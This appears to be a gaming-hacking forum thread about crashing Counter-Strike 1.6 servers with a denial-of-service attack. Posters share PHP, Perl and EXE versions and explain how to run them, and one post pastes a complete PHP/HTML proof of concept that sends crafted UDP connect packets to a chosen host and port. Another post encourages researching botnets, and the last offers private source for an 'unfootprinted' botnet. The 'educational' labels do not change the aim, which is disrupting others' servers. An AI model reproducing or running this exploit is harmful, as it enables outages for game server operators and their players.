Jump to content

Recommended Posts

Posted

Moved and locked since it has already been shared. Once with the source code and once compiled into .exe.

 

Becareful before you post!!

 

-K, unlocked cause it's kinda better explained guide

Posted

And why the hell is it a 300-post hidden guide?

Everybody who wants to know that, can open google and search for CS 1.6 DOS.

By the way this is the guide which Hax0r ment.

 

Have fun--

CS DoS:

PHP -> Klick(Password is 123) - Source

PERL -> Klick - Source

EXE -> Klick

Posted

Can you explain me how to use it ^^ :P ?

All 3 ways?

 

1st way doesnt work for me! I Fill up all and server dont crash

2st Dont know what to do with that

3st Dont know what to do with that

Posted

1. I didnt test. But its the only PHP DoS script which I've found. Maybe if server crashs, depends on the server version.

 

2. Install Perl 5.10. Start->Run->C:\random\csdos.pl

 

If you do it that way you have place csdos.pl in folder C:\random

 

3. Start->Run->C:\random\csdos.exe

You see how it worx.

 

//Edit: By the way I have to say (uuhh a rhyme :P), DoS = Denial of Service.

Another method of DoS is DDoS - Distributed Denial of Service.

Posted

First warning bloddog, if you review again  any of the hidden content i will dekarma you!

  • 3 weeks later...
  • 2 weeks later...
  • 2 weeks later...
Posted

FOR EDUCATIONAL USE ONLY

[br][br]

im not sure what was orig post as far as a dos exploit however i found one that was released on millworm ill paste the code below hope u find it usefull. Also research Botnets and EggDrops for other ave. of denial of service [br][br]<html>

<head>

<title>Counter Strike DOS POC (underwater@itdefence.ru) </title>

 

<style type="text/css">

 

input {

width: 150px;

}

 

td {

font-size: 12px;

font-family: Verdana, "Trebuchet MS";

text-align: left;

}

 

span.err {

color: red;

}

 

span.ok {

color: green;

}

 

</style>

 

</head>

 

<body onload="checkpass()">

 

<div style="width: 210px; margin: auto;">

<form name="csform" method="post" action="cs.php">

 

<table border="1" align="center" cellpadding="2" cellspacing="0" style="width: 100%;">

<tr>

<td style="width: 50px;">Host</td>

<td colspan="2"><input name="host" type="text" value=""/></td>

</tr>

 

<tr>

<td>Port</td>

<td colspan="2"><input name="port" type="text" value=""/></td>

</tr>

 

<tr>

<td> </td>

<td><input name="auth" type="checkbox" value="" style="width: 30px;"/></td>

<td>Auth Type 2</td>

</tr>

 

<tr>

<td>Pass</td>

<td colspan="2"><input name="pass" type="text" value="" /></td>

</tr>

 

 

<tr>

<td> </td>

<td colspan="2"><input type="submit" Value="Run"/></td>

</tr>

 

 

</table>

<br/>

</form>

</div>

<center>ITDEFENCE / RUSSIA (http://itdefence.ru)<br>

</body>

</html>

 

<?php

 

/*

CS-dos exploit made by underwater

Bug was discovered by .FUF 

Big respect 2 Sax-mmS ( for html ) , Focs ( for his cs server biggrin.gif ) , SkvoznoY , Bug(O)R,Antichat.ru and Cup.su

*/

 

ini_set("display_errors","0");

 

function HELLO_PACKET()

{

$packet = pack("H*","FFFFFFFF");

$packet .= "TSource Engine Query";

$packet .= pack("H*","00");

return $packet;

}

 

function CHALLENGE_PACKET()

{

$packet = pack("H*","FFFFFFFF");

$packet .= "getchallenge valve";

$packet .= pack("H*","00");

return $packet;

}

 

function LOGIN_PACKET_4()

{

global $cookie;

global $password;

$packet = pack("H*","FFFFFFFF");

$packet .= "connect 47 ";

$packet .= $cookie.' "';

$packet .= '\prot\4\unique\-1\raw\valve\cdkey\d506d189cf551620a70277a3d2c55bb2" "';

$packet .= '\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\mod';

$packet .= 'el\gordon\name\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';

$packet .= 'word\\'.$password;

$packet .= pack("H*","220A0000EE02");

return $packet;

}

 

function LOGIN_PACKET_2()

{

global $cookie;

global $password;

$packet = pack("H*","FFFFFFFF");

$packet .= "connect 47 ";

$packet .= $cookie.' "';

$packet .= '\prot\2\raw\d506d189cf551620a70277a3d2c55bb2" "\_cl_autowepswitch\1\bott';

$packet .= 'omcolor\6\cl_dlmax\128\cl_lc\1\cl_lw\1\cl_updaterate\30\model\gordon\nam';

$packet .= 'e\Born to be pig (..)\topcolor\30\_vgui_menus\1\_ah\1\rate\3500\*fid\0\pass';

$packet .= 'word\\'.$password;

$packet .= pack("H*","22");

return $packet;

}

 

function dowork($host,$port,$password,$auth)

{

global $password;

global $cookie;

# connecting to target host

$fsock = fsockopen("udp://".$host,(int) $port,$errnum,$errstr,2);

if (!$fsock) die ($errstr);

else

{

# sending hello packet

fwrite ($fsock,HELLO_PACKET());

fread ($fsock,100);

# sending chalennge packet

fwrite ($fsock,CHALLENGE_PACKET());

# recieving cookies

$resp = fread($fsock,100);

# grab cookies from packet

$cookie = substr($resp,strpos($resp,"A00000000")+10);

$cookie = substr($cookie,0,strpos($cookie," "));

# sending login packet

if (!$auth) fwrite ( $fsock,LOGIN_PACKET_4());else fwrite ( $fsock,LOGIN_PACKET_2());

$resp = fread($fsock,100);

}

}

 

IF (isset($_POST['host']) && isset($_POST['port']))

{

IF (empty($_POST['pass'])) $password = "123";

else $password = $_POST['pass'];

$fserver = $_POST['host'];

$fport = $_POST['port'];

if (isset($_POST['auth'])) $fauth = true;else $fauth=false;

# we have to connect 2 times

$result = dowork($fserver,$fport,$password,$fauth);

$result = dowork($fserver,$fport,$password,$fauth);

# parsing result

echo "Exploit Sent";

}

?>

 

  • 3 weeks later...
Posted

I would also like to know if people are interested i could add a Private source code for EDUCATIONAL purpose of a working unfootprinted bot net as i said not intended for illegal use just for educational. let me know here or in pm

 

Guest
This topic is now closed to further replies.


×
×
  • Create New...